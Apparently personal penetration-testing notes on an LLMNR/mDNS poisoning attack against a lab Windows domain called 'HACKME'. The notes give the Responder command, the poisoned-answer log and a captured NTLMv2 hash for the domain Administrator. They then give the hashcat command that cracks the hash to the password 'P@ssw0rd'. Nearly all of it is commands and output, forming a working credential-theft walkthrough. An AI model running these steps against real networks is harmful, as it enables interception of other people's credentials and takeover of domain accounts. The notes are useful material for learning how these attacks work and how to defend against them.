Llmnr
LLMNR is used to identify hosts when DNS fails to do so, previously NBT-NS
The key flaw is that the services utilize a user’s NTLMv2 hash when appropriately responded to
Run responder:
kali@kali-[~]$sudo responder -I eth0 -rdw -v
Wait for responder
[*] [MDNS] Poisoned answer sent to 192.168.133.147 for name wrongname.local
[*] [LLMNR] Poisoned answer sent to 192.168.133.147 for name wrongname
[*] [LLMNR] Poisoned answer sent to 192.168.133.147 for name wrongname
[*] [MDNS] Poisoned answer sent to 192.168.133.147 for name wrongname.local
[SMB] NTLMv2-SSP Client : 192.168.133.147
[SMB] NTLMv2-SSP Username : HACKME\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::HACKME:31b8abf4813de8cf:A45BDA8ABC40A3615798BB335DD66475:010100000000000080E9DE1E1C9DD801EE21F8DEAF285E3300000000020008005800570032004D0001001E00570049004E002D00330054003100490056004E005400350031004300540004003400570049004E002D00330054003100490056004E00540035003100430054002E005800570032004D002E004C004F00430041004C00030014005800570032004D002E004C004F00430041004C00050014005800570032004D002E004C004F00430041004C000700080080E9DE1E1C9DD8010600040002000000080030003000000000000000000000000030000053C7D104F9FA22A7353EB6A377FD205C9044D01F700554384BF23D1CB31C87180A0010000000000000000000000000000000000009001C0063006900660073002F00770072006F006E0067006E0061006D0065000000000000000000
This hash can then be run through hashcat and attempted to be cracked
kali@kali-[~]$hashcat -m 5600 -a 0 "Administrator::HACKME:31b8abf4813de8cf:A45BDA8ABC40A3615798BB335DD66475:010100000000000080E9DE1E1C9DD801EE21F8DEAF285E3300000000020008005800570032004D0001001E00570049004E002D00330054003100490056004E005400350031004300540004003400570049004E002D00330054003100490056004E00540035003100430054002E005800570032004D002E004C004F00430041004C00030014005800570032004D002E004C004F00430041004C00050014005800570032004D002E004C004F00430041004C000700080080E9DE1E1C9DD8010600040002000000080030003000000000000000000000000030000053C7D104F9FA22A7353EB6A377FD205C9044D01F700554384BF23D1CB31C87180A0010000000000000000000000000000000000009001C0063006900660073002F00770072006F006E0067006E0061006D0065000000000000000000" /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
.....
ADMINISTRATOR::HACKME:31b8abf4813de8cf:a45bda8abc40a3615798bb335dd66475:010100000000000080e9de1e1c9dd801ee21f8deaf285e3300000000020008005800570032004d0001001e00570049004e002d00330054003100490056004e005400350031004300540004003400570049004e002d00330054003100490056004e00540035003100430054002e005800570032004d002e004c004f00430041004c00030014005800570032004d002e004c004f00430041004c00050014005800570032004d002e004c004f00430041004c000700080080e9de1e1c9dd8010600040002000000080030003000000000000000000000000030000053c7d104f9fa22a7353eb6a377fd205c9044d01f700554384bf23d1cb31c87180a0010000000000000000000000000000000000009001c0063006900660073002f00770072006f006e0067006e0061006d0065000000000000000000:P@ssw0rd
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: ADMINISTRATOR::HACKME:31b8abf4813de8cf:a45bda8abc40...000000
Time.Started.....: Thu Jul 21 16:15:13 2022 (0 secs)
Time.Estimated...: Thu Jul 21 16:15:13 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1331.8 kH/s (1.83ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/14344385 (0.06%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitetiger
Started: Thu Jul 21 16:15:13 2022
Stopped: Thu Jul 21 16:15:15 2022